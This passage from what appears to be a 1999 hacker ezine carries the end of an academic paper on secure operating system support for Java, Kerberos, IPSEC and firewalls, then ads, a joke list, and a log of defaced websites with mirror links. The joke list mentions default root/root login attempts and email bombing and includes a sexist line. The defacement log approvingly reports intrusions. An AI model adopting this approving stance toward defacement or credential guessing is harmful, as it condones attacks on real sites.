are implemented as object code and are not subject to the JVM�s type-safety checks. The JVM is not able to protect itself from tampering by other applications. Finally,
the Java security model can offer no protection from the many other forms of malicious mobile code. In [30], the authors call for trusted systems to support a
system-wide solution to address the threats presented by non-Java code.
Even if such problems with the JVM did not exist, these security solutions would still suffer from the fundamental limitation that they rely on application-space access
control for security. They all depend on the local file system to preserve the integrity of the system code, including class files. All of the systems which store policy
locally depend on file system access control to preserve the integrity of the policy files. Section 3.1 demonstrated the importance of secure operating system features for
supporting application-space access control.
Another popular approach to �securing� mobile code is to require digitally signed applets and limit execution to those originating from trusted sources [27]. In fact, native
ActiveX security is based entirely on digital signatures, as it has no form of access control [24][27]. The basic flaw with this approach is that it is an all-or-nothing
proposition; the user cannot constrain a native ActiveX control to a limited security domain. Mandatory security mechanisms in the operating system may be used for
this purpose, by confining the browser to a distinct security domain.
Note that, although not sufficient by themselves, digital signatures will play an important part in mobile code security, even on secure operating systems. They can reduce
the risk of malicious code entering the system, provide some measure of trust that an applet will behave properly, and provide another piece of information to use in
making an access control decision. However, as with the general application-space cryptography described in section 3.2, the digital signature verification mechanism
depends on secure operating system features to guarantee invocation, to protect the integrity of the mechanism, and to protect the integrity of the locally cached public
keys.
The need for an operating system trusted path mechanism was highlighted by [67] which demonstrates the ease with which a trojan horse applet can capture credit card
numbers, PIN numbers or passwords by perfectly emulating a window system dialog box. The proposed solution was an ad hoc user-level trusted path mechanism
which required a user to customize his dialog box with a complicated graphical pattern. This solution is not adequate as it only increases the sophistication required in the
trojan horse.
Other systems attempt to provide alternative security solutions to the mobile code threat. The Janus system [26] interposes on Solaris system calls to constrain untrusted
native applications, and Safe-Tcl [49] provides a �safe interpreter� which attempts to limit the command set available to untrusted code. However, like the Java security
solutions, these systems are subject to the same vulnerabilities as any other application-space access control mechanism; consequently, they require secure operating
system support.
Beyond enabling all of the mobile code systems mentioned above to function securely, a secure system could also simplify them. Rather than implementing their security
primitives in application space where they are vulnerable, they could utilize the system security services to provide a better overall system. A properly designed secure
system would provide a flexible, economic foundation with one consistent security model for all of the different virtual machine efforts to use.
4.2 Kerberos
Kerberos [31][47] is a network authentication service originally developed for Project Athena at MIT. In addition to providing an authentication service, Kerberos
supports the establishment of session keys to support network confidentiality and integrity services. Derivatives of Kerberos have been used to provide authentication
and key establishment services for AFS [64], DCE [53], and ONC RPC [21]. Kerberos and systems that rely on Kerberos have been suggested as a means of providing
security for the World Wide Web [18][36][37].
Kerberos is based on symmetric cryptography with a trusted key distribution center (KDC) for each realm. The Kerberos KDC has access to the secret key of every
principal in its realm. Consequently, a compromise of the KDC can be catastrophic. This is generally addressed by requiring that the KDC be both physically secure and
dedicated solely to running the Kerberos authentication server [46].3 A typical environment also uses physically-secure dedicated systems for the servers using
Kerberos. Without these environmental assumptions, the Kerberos authentication service and the Kerberized server applications would require secure operating system
features to rigorously ensure that they are tamperproof and unbypassable. For the sake of argument, the remainder of this section will consider these environmental
assumptions to be true and focus only on the security of the client workstations.
___________________
3. Variants of Kerberos have been proposed that use asymmetric cryptography either to reduce the cost incurred by a penetration of the KDC or to completely eliminate
the need for the KDC [63] [66][42][18].
Kerberos was designed for an environment where the client workstations and the network are assumed to be completely untrustworthy [10][45]. However, since the
software on the client workstation mediates all interactions between its user and the Kerberized server applications, this assumption implies that the Kerberized server
applications must view all client applications as potentially malicious software. Furthermore, a Kerberized server application has no means of establishing a trusted path
to a user on a client workstation, since that would require trusted code on the client workstation. Thus, in a system that uses Kerberos, malicious software executed by a
user is free to arbitrarily modify or leak a user�s information, with no means of confinement; no distinctions between a user�s legitimate requests and the requests of
malicious software are possible. Given the increasing ease with which malicious software may be introduced into a system, the Kerberos environmental model seems
untenable. As noted in [14], secure end-to-end transactions require trusted code at both end points.
As a basis of further discussion, suppose that there is a base set of trustworthy software on the client work-stations which is protected against tampering, but that the
client workstation operating system still lacks mechanisms for mandatory security and trusted path. Furthermore, suppose that the client workstation is a single-user
system which does not export any services to other systems. In spite of these assumptions, a user is still vulnerable to attacks by malicious software, such as mobile
code downloaded by the user.
If the malicious software could spoof the client-side authentication program to the user, then it may be able to obtain a user�s password. Even with one-time passwords,
this attack would permit the malicious software to act on behalf of the user during the login session. A trusted path mechanism in the client workstation�s operating
system can be used to prevent such an attack. Additionally, such a trusted path mechanism in combination with support for a network protected path can be used to
provide a trusted path between users and server applications.
If the malicious software can read the files used by the Kerberos client software to store tickets and session keys, then the malicious software may directly impersonate
the user to the corresponding Kerberized server applications. Even if the session keys are encapsulated within a hardware cryptographic token, the malicious software
can invoke the cryptographic token on behalf of the user, exploiting the misuse vulnerability discussed in section 3.2. Mandatory security mechanisms can be used to
rigorously protect either the file or the cryptographic token against access by malicious software.
4.3 Network Security Protocols
The IPSEC network security protocols [5][3][4] are used to provide authentication, integrity, and confidentiality services at the IP layer. Typical implementations of the
IPSEC protocols rely on application-space key management servers to perform key exchanges and supply keys for security associations. The IPSEC module in the
network stack communicates with the local key management server via upcalls to retrieve the necessary information.
SSL [69] is another network security protocol that provides authentication, integrity, and confidentiality services and a negotiation service for keys and cryptographic
algorithms. SSL, however, is implemented entirely in application space and requires no kernel modifications. SSL has been implemented as a library that interposes on
socket calls to incorporate the SSL protocol between the underlying transport protocol of the socket (e.g., TCP) and the application protocol (e.g., HTTP).
Since it relies on application-space cryptography, the key management server used by IPSEC is subject to the vulnerabilities described in section 3.2 and requires
mandatory security mechanisms in the operating system for adequate protection. In turn, since the protection provided by IPSEC depends on the protection of the keys,
mandatory security mechanisms in the operating system are also crucial to meeting the security requirements of IPSEC. Since the complete SSL implementation
operates in application space, it is directly subject to the vulnerabilities described in section 3.2 and requires mandatory security mechanisms in the operating system for
adequate protection.
Both IPSEC and SSL are intended to provide secure channels. However, as noted in [14], an end-to-end secure transaction requires a secure channel and secure end
points. If an attacker can penetrate one of the end points and directly access the unprotected data, then the protection provided by IPSEC and SSL is only illusory.
4.4 Firewalls
A network firewall is a mechanism for enforcing a trust boundary between two networks. The analysis of this section is based on the discussions in [17][9][11][6].
Commonly, firewalls are used to maintain a separation between insiders and outsiders for an organization�s computing resources. Internal firewalls may also be used to
provide separation between different groups of insiders or to provide defense-in-depth against outsiders.
Modern firewall architectures typically involve the use of bastion hosts; in a screened subnet architecture, there may be an external bastion host on a perimeter network,
which is highly exposed to outsiders, and an internal bastion host on the internal network, which is exposed to the external bastion host. The security of the bastion hosts
is crucial to the security provided by the firewall. To reduce risk, bastion hosts are typically dedicated systems, only providing the minimal services required. Even with
such minimal configuration, flaws in the proxy servers on the bastion host may permit penetration. However, mandatory security mechanisms in the operating systems of
the bastion hosts may be used to confine proxy servers so that penetrations are narrowly limited. Similarly, the bastion host�s mandatory security mechanisms may be
used to protect proxy servers against tampering.
Firewalls provide no protection against malicious insiders. Typically, insiders can easily leak information through the firewall. Malicious insiders can construct tunnels to
permit outsiders to perform inbound calls through the firewall or may provide ways of bypassing a firewall entirely. Additionally, malicious insiders can exploit data
leaked between users within the firewall. Although internal firewalls may be used to partition insiders into multiple trust classes, the granularity of protection is quite
limited in comparison to what can be provided by a secure operating system.
The ability of malicious insiders to leak data through the firewall can be confined by mandatory security mechanisms in the operating systems of the internal hosts.
Likewise, mandatory security mechanisms in the operating systems of the internal hosts can confine outsiders who perform inbound calls through tunnels constructed by
a malicious insider to the security domains in which the malicious insider is allowed to operate.
In addition to the threat of malicious insiders, a firewall is at risk from the threat of malicious software executed by benign insiders. Typically, firewalls do not require
that insiders strongly authenticate themselves to the firewall in order to access external services through the firewall [40]. Hence, if a benign insider executes malicious
software on an internal host, the malicious software may seek to subvert the protection of the firewall in the same fashion as a malicious insider. An example of using a
malicious Java applet to enable outsiders to penetrate a firewall is given in [40]. Even if insiders are required to strongly authenticate themselves to the firewall, a benign
insider may still execute a trojan horse whose overt purpose requires external access; in this case, the malicious software may still subvert the protection of the firewall.
Mandatory security mechanisms in the operating systems of the internal hosts may be used to protect users against execution of malicious software or to confine such
software when it is executed. If strong authentication is required prior to accessing external services, mandatory security mechanisms could be used to ensure that only
trustworthy software on the internal hosts can communicate with the strong authentication mechanism on the firewall. In any case, the mandatory security mechanisms
would limit the ability of malicious software to leak information or support inbound calls.
Firewalls are also susceptible to malicious data attacks [62]. Some example malicious data attacks relevant to firewalls are described in [68][40][16]. As with malicious
insiders and malicious software, mandatory security mechanisms in the operating systems of the bastion hosts and the internal hosts may be used to confine malicious
data attacks.
When inbound services are supported by a firewall, the firewall itself cannot protect the remote system against compromise. The remote system�s operating system
must protect against misuse of the allowed inbound services and must protect any information acquired through the inbound service against leakage. Mandatory security
mechanisms in the remote system�s operating system may be used to provide such protection. Additionally, mandatory security mechanisms in the internal host�s
operating system are needed to confine any attack from a penetrated remote system.
When a benign insider wishes secure access to a remote service, the firewall itself cannot provide complete protection for the use of the remote service. The internal
host�s operating system must protect against any attempts by the server to trick the client into misusing its privileges, as in the case where a browser executes a
malicious applet provided by a server; mandatory security mechanisms in the internal host�s operating system may be used to confine these client applications.
5 System Security
No single technical security solution can provide total system security; a proper balance of security mechanisms must be achieved. Each security mechanism provides
specific security functions and should be designed to only provide those functions. It should rely on other mechanisms for support and for required security services. In a
secure system, the entire set of mechanisms complement each other so that they collectively provide a complete security package. Systems that fail to achieve this
balance will be vulnerable.
As has been shown throughout this paper, a secure operating system is an important and necessary piece to the total system security puzzle, but it is not the only piece.
A highly secure operating system would be insufficient without application-specific security built upon it. Certain problems are actually better addressed by security
implemented above the operating system. One such example is an electronic commerce system that requires a digital signature on each transaction. A application-space
cryptographic mechanism in the transaction system protected by secure operating system features might offer the best system security solution.
No single security mechanism is likely to provide complete protection. Unsolved technical problems, implementation errors and flawed environmental assumptions will
result in residual vulnerabilities. As an example, covert channels remain a serious technical challenge for secure operating system designers. These limitations must be
understood, and suitable measures must be taken to deploy complementary mechanisms designed to compensate for such problems. In the covert channel example,
auditing and detection mechanisms should be utilized to minimize the chances that known channels are exploited. In turn, these should depend on secure operating
systems to protect their critical components, such as audit logs and intrusion sensors, because they are subject to the same types of vulnerabilities as those discussed
throughout this paper.
6 Summary
This paper has argued that the threats posed by the modern computing environment cannot be addressed without secure operating systems. The critical operating system
security features of mandatory security and trusted path have been explained and contrasted with the inadequate protection mechanisms of mainstream operating
systems. This paper has identified the vulnerabilities that arise in application-space mechanisms for access control and cryptography and has demonstrated how
mandatory security and trusted path mechanisms address these vulnerabilities. To provide a clear sense of the need for these operating system features, this paper has
analyzed concrete examples of current approaches to security and has shown that the security provided by these approaches is inadequate in the absence of such
features. Finally, the reader was given a perspective of system security where both secure operating systems and application-space security mechanisms must
complement each other in order to provide the correct level of protection.
By arguing that secure operating systems are indispensable to system security, the authors hope to spawn a renewed interest in operating system security. If security
practitioners were to more openly acknowledge their security solution�s operating system dependencies and state these dependencies as requirements for future
operating systems, then the increased demand for secure operating systems would lead to new research and development in the area and ultimately to commercially
viable secure systems. In turn, the availability of secure operating systems would enable security practitioners to concentrate on security services that belong in their
particular components rather than dooming them to try to address the total security problem with no hope of success.
7 References
[1] M. Abrams et al, Information Security: An Integrated Collection of Essays, IEEE Comp. 1995.
[2] J. Anderson, Computer Security Technology Planning Study [PDF 7,893K], Air Force Elect. Systems Div., ESD-TR-73-51, October 1972.
[3] R. Atkinson. IP Authentication Header (AH) [TXT 30K]. IETF RFC 1826, August 1995.
[4] R. Atkinson. IP Encapsulating Security Payload (ESP) [TXT 30K]. IETF RFC 1827, August 1995.
[5] R. Atkinson. Security Architecture for the Internet Protocol [TXT 55K]. IETF RFC 1825, August 1995.
[6] Badger et al. DTE Firewalls, Initial Measurement and Evaluation Report. Trusted Information Systems Technical Report #0632R, March 1997.
[7] L. Badger et al. Practical Domain and Type Enforcement for UNIX. Proceedings of IEEE Symposium on Security and Privacy, May 1995.
[8] D. Baker. Fortresses Built Upon Sand. Proceedings of the New Security Paradigms Workshop, 1996.
[9] S. Bellovin and W. Cheswick. Network Firewalls. IEEE Communications, September 1994.
[10] S. Bellovin and M. Merritt. Limitations of the Kerberos Authentication System. Computer Communications Review 20(5), October 1990.
[11] B. Blakley. The Emperor�s Old Armor. Proceedings of the New Security Paradigms Workshop, 1996.
[12] W. Boebert and R. Kain, A Further Note on the Confinement Problem. Proceedings of the 30th IEEE International Carnahan Conference on Security
Technology, 1996.
[13] W. Boebert and R. Kain. A Practical Alternative to Hierarchical Integrity Policies. Proceedings of the 8th National Computer Security Conference, 1985.
[14] E. Brewer at al. Basic Flaws in Internet Security and Commerce. http://http.cs.berkeley.edu/~gauthier/endpoint-security.html, 1995.
[15] W. Brierley. Integrating Cryptography into Trusted Systems: A Criteria Approach. Proceedings of the 8th IEEE Conference on Computer Security
Applications, 1992.
[16] Computer Emergency Response Team. Advisory 93:16.
[17] D. Chapman and E. Zwicky. Building Internet Firewalls. O�Reilly, 1995.
[18] D. Davis. Kerberos Plus RSA for World Wide Web Security. Proceedings of the 1st USENIX Workshop on Electronic Commerce, July 1995.
[19] D. Dean et al. Java Security: From HotJava to Netscape and Beyond. Proceedings of the IEEE Symposium on Security and Privacy, 1996.
[20] DOD 5200.28-STD. Department of Defense Trusted Computer System Evaluation Criteria, December 1985.
[21] M. Eisler et al. Security Mechanism Independence in ONC RPC. Proceedings of the 6th USENIX UNIX Security Symposium, July 1996.
[22] D. Ferraiolo and R. Kuhn. Role-Based Access Control. Proceedings of the 15th National Computer Security Conference, 1992.
[23] B. Ford et al. Microkernels Meet Recursive Virtual Machines. Proceedings of 2nd USENIX Symposium on Operating Systems Design and Implementation,
October 1996.
[24] S. Garfinkel. Web Security and Commerce. O�Reilly & Associates, Cambridge, 1997.
[25] M. Gasser. Building a Secure Computer System. Van Nostrand Reinhold Company, New York, 1988.
[26] I. Goldberg et al. A Secure Environment for Untrusted Helper Applications [PS 173K]. Proceedings of 6th USENIX Unix Security Symposium, July 1996.
[27] L. Gong. Java Security: Present and Near Future. IEEE Micro, May/June 1997.
[28] R. Graubart. Operating System Support for Trusted Applications. Proceedings of the 15th National Computer Security Conference, 1992.
[29] M. Harrison et al. Protection in Operating Systems. Communications of the ACM 19(8), August 1976.
[30] T. Jaeger et al. Building Systems that Flexibly Control Downloaded Executable Content. Proceedings of the 6th USENIX Security Symposium, July 1996.
[31] J. Kohl and C. Neuman. The Kerberos Network Authentication Service V5 [TXT 268K]. IETF RFC 1510, September 1993.
[32] M. Ladue. When Java Was One: Threats from Hostile Byte Code. Proceedings of the 20th National Information Systems Security Conference, 1997.
[33] B. Lampson. A Note on the Confinement Problem. Communications of the ACM 16(10), 1973.
[34] B. Lampson et al. Authentication in Distributed Systems: Theory and Practice. Proceedings of the 13th ACM Symposium on Operating Systems Principles,
1992.
[35] J. Lepreau et al. The Persistent Relevance of the Local Operating System to Global Applications. Proceedings of the 7th ACM SIGOPS European Workshop,
September 1996.
[36] S. Lewontin. The DCE-Web Toolkit. Proceedings of the 3rd International World Wide Web Conference, 1995.
[37] S. Lewontin and M. Zurko. The DCE Web Project: Providing Authorization and Other Distributed Services to the World Wide Web. Proceedings of the 2nd
International World Wide Web Conference, 1994.
[38] J. Liedtke. L4 Reference Manual. Research Report RC 20549, IBM T. J. Watson Research Center, September 1996.
[39] T. Linden. Operating System Structures to Support Security and Reliable Software [PDF 3,424K]. ACM Computing Surveys 8(4), Dec. 1976.
[40] D. Martin et al. Blocking Java Applets at the Firewall. Proceedings of the Internet Society Symposium on Network and Distributed Systems Security, 1997.
[41] D. Mazieres and M. Kaashoek. Secure Applications Need Flexible Operating Systems. Proceedings of the 6th Workshop on Hot Topics in Operating Systems,
May 1997.
[42] A. Medvinsky et al. Public Key Utilizing Tickets for Application Servers. IETF Draft Jan 1997 expires July 1997.
[43] S. Minear. Providing Policy Control Over Object Operations in a Mach Based System. Proceedings of the 5th USENIX Security Symposium, April 1995.
[44] NCSC-TG-005. Version 1. NCSC Trusted Network Interpretation, July 1987.
[45] C. Neuman and J. Steiner. Authentication of Unknown Entities on an Insecure Network of Untrusted Workstations. Proceedings of the Usenix Workshop on
Workstation Security, August 1988.
[46] C. Neuman and T. Ts�o. Kerberos: An Authentication Service for Computer Networks. IEEE Communications Magazine, September 1994.
[47] C. Neuman et al. The Kerberos Network Authentication Service V5 R6. IETF Draft July 1997, expires Jan 1998.
[48] R. O�Brien and C. Rogers. Developing Applications on LOCK. Proceedings of the 14th National Computer Security Conference, 1991.
[49] J. Ousterhout et al. The Safe-Tcl Security Model. Sun Labs Technical Report TR-97-60, March 1997.
[50] President�s Commission On Critical Infrastructure Protection. Research and Development Recommendations for Protecting and Assuring Critical National
Infrastructures, September 1997.
[51] M. Roe and T. Casey. Integrating Cryptography in the Trusted Computing Base. Proceedings of the 6th IEEE Conference on Computer Security Applications,
1990.
[52] RSA Laboratories. Public Key Cryptography Standard No. 11 - Cryptoki Version 2.0. RSA Laboratories, pp. 24-25, April 1997.
[53] R. Salz. DCE 1.2 Contents Overview. Open Group RFC 63.3, October 1996.
[54] J. Saltzer and M. Schroeder. The Protection of Information in Computer Systems. Proceedings of the IEEE, 63(9), September 1975.
[55] B. Schneier. Applied Cryptography, 2nd Edition. John Wiley & Sons, New York, 1996. p. 169-187, 216-225.
[56] Secure Computing Corporation. Assurance in the Fluke Microkernel: Formal Security Policy Model, Technical report MD A904-97-C-3047 CDRL A003,
March 1998.
[57] Secure Computing Corporation. DTOS Covert Channel Analysis Plan, Technical report MD A904-93-C-4209 CDRL A017, May 1997.
[58] Secure Computing Corporation. DTOS Generalized Security Policy Specification, Technical report MD A904-93-C-4209 CDRL A019 June 1997.
(http://www.securecomputing.com/randt/HTML/dtos.html)
[59] Secure Computing Corporation. DTOS General System Security and Assurability Assessment Report, Technical report MD A904-93-C-4209 CDRL A011 June
1997. (http://www.securecomputing.com/randt/HTML/dtos.html)
[60] Secure Computing Corporation. LOCKed Workstation Cryptographic Services Study, Technical Report MD A904-94-C-6045 CDRL A009, September 1995.
[61] Secure Computing Corporation. Security Requirements Specification and Requirements Rationale Report for the Technical Study Demonstrating the
Feasibility of Software-Based Cryptography on INFOSEC Systems, Technical report MDA904-91-C-7103 CDRL A011 and A012, May 1994.
[62] W. Sibert. Malicious Data and Computer Security. Proceedings of the 19th National Information Systems Security Conference, 1996.
[63] M. Sirbu and J. Chuang. Distributed Authentication in Kerberos using Public Key Cryptography. Proceedings of the Symposium on Network and Distributed
System Security, 1997.
[64] M. Spasojevic and M. Satyanarayanan. An Empirical Study of a Wide-Area Distributed System. ACM Transactions on Computer Systems 14(2), May 1996.
[65] S. Sutton and S. Hinrichs. MISSI B-level Windows NT Feasibility Study Final Report. Technical Report, NSA MISSI Contract MDA904-95-C-4088, December
1996.
[66] B. Tung et al. Public Key Cryptography for Initial Authentication in Kerberos. IETF Draft expires Jan 1998.
[67] J. Tyger and A. Whitten. WWW Electronic Commerce and Java Trojan Horses. Proceedings of the 2nd Usenix Workshop on Electronic Commerce,
November 1996.
[68] W. Venema. Murphy�s Law and Computer Security. Proceedings of the 6th USENIX Unix Security Symposium, 1996.
[69] D. Wagner and B. Schneier. Analysis of the SSL 3.0 Protocol. Proceedings of the 2nd USENIX Workshop on Electronic Commerce, November, 1996.
[70] D. Wallach et al. Extensible Security Architectures for Java. Technical Report 546-97, Dept. of Computer Science, Princeton University, April 1997.
[End]
HTML links added.
Conversion to HTML by JYA/Urban Deadline.
@HWA
!=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
O
0
o
O O O
0
-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
END of main news articles content... read on for ads, humour, hacked websites etc
-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
HWA.hax0r.news
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>
+-----------------------------------------------------------------------------+
| SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+-----------------------------------------------------------------------------+
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! .............
HOW YOU KNOW YOUR A
TRY HARD HACKER
by Radim Kolar
Dokument prevzat ze site The Ethernity Service. Vsechny dokumenty v teto siti jsou anonymni a
verejne siritelne.
HOW YOU KNOW YOUR A TRY HARD HACKER
-------------------------------------
I just wrote this to tell all you try hard hackers something.
1) You goto other hacker pages on the web.
2) You think loading a program that waz made by a hacker is hacking.
3) The only thing you do is get the lastest passwd file from your isp.
4) You goto channels like #hack and ask for passwd files.
5) You don't know where to get warez.
6) You always telnet to hosts and type
login: root
password: root
and stuff like that.
7) You brag about how you are a hacker.
8) You don't know C.
9) Your a girl.
10) You don't know what's a shell.
11) You don't know what Linux, FreeBSD and all those other UNIX's are.
12) You don't have a UNIX OS.
13) You think when using IRC war scripts, your hacking.
14) Asking how to hack other people's computer.
15) You try cracking a shadowed passwd file.
16) You don't know if a passwd file is shadowed or not.
17) You ask what is a T1.
18) You ask how to email bomb and you think email bombing is a form of hacking.
19) Your learning BASIC language.
20) You think you can get into hacking straight away.
21) You don't know how to set up an eggdrop bot.
22) You think .mil stands sites stand for a country.
From http://netmag.cz/98/5/hacker.html
@HWA
SITE.1
#1 http://welcome.to/UnXplained
SiteOp: Joe Cool
New underground site,features sections from Hacking to the Paranormal
This site has a lot of fluff, it looks really professional, some of the
content however suffers due to this setup, ie: the hacking webpages text
is covered over many html pages instead of one textfile or page for easy
downloading, other than that this site kicks ass, be sure to check it out.
(coaxed into putting this here from irc by JoeCool, nice site! ... :)))
#2 http://www.security-news.com/
.de German site, partially in english, also offers a security newsletter
- eentity
#3 http://www.hackunlimited.com/
Finnish site, in finnish, very nicely laid out, the only finnish site in
our international list, send in those international links!
- Ed
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Latest cracked pages courtesy of attrition.org
[99.08.07] NT [mozy] CDNiso (www.cdniso.com)
[99.08.07] So [HiP] CNCTek (www.cnctek.com)
[99.08.07] So [LevelSeven] Deluxe Solutions (www.deluxesolutions.com)
[99.08.07] So [SQ] M Energy Catalog (www.energycatalog.com)
[99.08.07] NT [fallen angels] Haxan Movies (www.haxan.com)
[99.08.07] NT [neeper] #2 Home Web (www.home-web.com)
[99.08.07] NT [^ImPiSh[]BlOoD^] Kassy (www.kassy.com)
[99.08.07] Sc [Hit2000] M Ostwest Galerie (CH) (www.ostwest-galerie.ch)
[99.08.07] So [LevelSeven] Radisson Seven Seas Cruises (www.rssc.com)
[99.08.07] NT [kl0wn krew] Vintage Realtors (www.vintagerealtors.com)
[99.08.07] NT [ ] Wichitaks Net (www.wichitaks.net)
[99.08.07] NT [^DarkManX^] Yale Com (AR) (www.yale.com.ar)
[99.08.07] So [Hi-Tech Hate] Malaysian Institute of Diplomacy and Foreign Relation (MY) (www.idhl.gov.my)
[99.08.07] So [gH] Internet Wrestling Zone (www.prowrestling.com)
[99.08.08] Li [Pakistan HC] Flag Group (www.flag-group.com)
[99.08.08] So [?] K CSRC Gov (CN) (www.csrc.gov.cn)
[99.08.08] So [keebler elves] #3 IDHL Gov (MY) (www.idhl.gov.my)
[99.08.08] So [kl0wn krew] 800-666-suck (www.1800666suck.com)
[99.08.08] So [kl0wn krew] Fantasy Car (www.fantasycar.com)
[99.08.08] So [kl0wn krew] Asian Slut (www.asianslut.com)
[99.08.08] So [kl0wn krew] Bi Studs (www.bistuds.com)
[99.08.08] So [Narr0w] M Naked Obsessions (www.nakedobsessions.com)
[99.08.08] So [kl0wn krew] M Republican Sex Addicts (www.republicansexaddicts.com)
Hacked: http://www.glrppr.uiuc.edu/
By: Mozy
Mirror:
http://www.attrition.org/mirror/attrition/edu/www.glrppr.uiuc.edu
[99.08.10] Li [Elmer Fudd] KSCU 103.3 FM, The Underground Sound of Santa Clara (www.kscu103.com)
[99.08.10] NT [Uneek Technologies] State of Michigan Official Site (www.state.mi.us)
[99.08.10] So [ ] Wired Digital (www.wired.com)
[99.08.10] So [sQ] M Latif (www.latif.com)
[99.08.10] NT [Sarin] Federal Energy Regulatory Commission (www.ferc.fed.us)
[99.08.10] So [mozy] M Great Lakes Regional Pollution Prevention Roundtable (www.glrppr.uiuc.edu)
Hacked: http://www.inaoep.mx (third time)
By: Keebler elves
Mirror: http://www.attrition.org/mirror/attrition/mx/www.inaoep.mx-3
defaced: www.go.com
by: blitzen
mirror: http://www.attrition.org/mirror/attrition/com/infoseek.go.com/
and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Columbia......: http://www.cascabel.8m.com
http://www.intrusos.cjb.net
Finland ........http://hackunlimited.com/
Germany ........http://www.alldas.de/
http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
http://members.xoom.com/neblonica/
http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa ...http://www.hackers.co.za
http://www.hack.co.za
http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
.za (South Africa) sites contributed by wyzwun tnx guy...
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
